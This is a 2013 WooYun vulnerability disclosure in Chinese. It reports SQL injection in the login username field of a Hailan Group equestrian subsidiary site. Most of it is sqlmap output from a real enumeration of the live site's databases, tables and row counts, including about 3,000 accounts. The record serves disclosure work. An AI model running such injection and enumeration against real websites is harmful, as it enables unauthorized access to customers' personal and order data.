当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045861

漏洞标题:海澜集团旗下某分站存在SQL注入可导致信息泄露

相关厂商:海澜集团

漏洞作者: sunding

提交时间:2013-12-16 11:24

修复时间:2014-01-30 11:25

公开时间:2014-01-30 11:25

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

海澜集团旗下某分站存在SQL注入,导致信息泄露

详细说明:

漏洞地址:http://heilanequestrian.com/account/login.html
用户名存在SQL注入

1.png


web application technology: Apache
back-end DBMS: MySQL 5.0
[16:32:18] [INFO] fetching current user
[16:32:18] [INFO] resumed: horse@172.16.%.%
current user:    'horse@172.16.%.%'
[16:32:18] [INFO] fetching current database
[16:32:18] [INFO] resumed: horsemanship
current database:    'horsemanship'
[16:32:18] [INFO] fetching database names
[16:32:18] [INFO] the SQL query used returns 3 entries
[16:32:18] [INFO] resumed: information_schema
[16:32:18] [INFO] resumed: horsemanship
[16:32:18] [INFO] resumed: test
available databases [3]:
[*] horsemanship
[*] information_schema
[*] test
---
[16:39:25] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[16:39:25] [INFO] fetching tables for database: 'horsemanship'
[16:39:25] [INFO] the SQL query used returns 10 entries
[16:39:25] [INFO] resumed: account
[16:39:25] [INFO] resumed: account_card
[16:39:25] [INFO] resumed: invoice_type
[16:39:25] [INFO] resumed: order_compete
[16:39:25] [INFO] resumed: order_seats
[16:39:25] [INFO] resumed: orders
[16:39:25] [INFO] resumed: static_content
[16:39:25] [INFO] resumed: user_basic
[16:39:25] [INFO] resumed: user_powers
[16:39:25] [INFO] resumed: user_powers_option
Database: horsemanship
[10 tables]
+--------------------+
| account            |
| account_card       |
| invoice_type       |
| order_compete      |
| order_seats        |
| orders             |
| static_content     |
| user_basic         |
| user_powers        |
| user_powers_option |
+--------------------+
[16:39:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[16:39:49] [WARNING] missing table parameter, sqlmap will retrieve the number of
 entries for all database management system databases' tables
[16:39:49] [INFO] fetching tables for database: 'horsemanship'
[16:39:49] [INFO] the SQL query used returns 10 entries
[16:39:49] [INFO] resumed: account
[16:39:49] [INFO] resumed: account_card
[16:39:49] [INFO] resumed: invoice_type
[16:39:49] [INFO] resumed: order_compete
[16:39:49] [INFO] resumed: order_seats
[16:39:49] [INFO] resumed: orders
[16:39:49] [INFO] resumed: static_content
[16:39:49] [INFO] resumed: user_basic
[16:39:49] [INFO] resumed: user_powers
[16:39:49] [INFO] resumed: user_powers_option
[16:39:49] [INFO] resumed: 3030
[16:39:58] [WARNING] reflective value(s) found and filtering out
[16:39:58] [INFO] retrieved: 0
[16:40:07] [INFO] retrieved: 2
[16:40:16] [INFO] retrieved: 703
[16:40:25] [INFO] retrieved: 850
[16:40:34] [INFO] retrieved: 799
[16:40:43] [INFO] retrieved: 0
[16:40:53] [INFO] retrieved: 2
[16:41:02] [INFO] retrieved: 0
[16:41:11] [INFO] retrieved: 0
Database: horsemanship
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| account       | 3030    |
| order_seats   | 850     |
| orders        | 799     |
| order_compete | 703     |
| invoice_type  | 2       |
| user_basic    | 2       |
+---------------+---------+

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 sunding@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝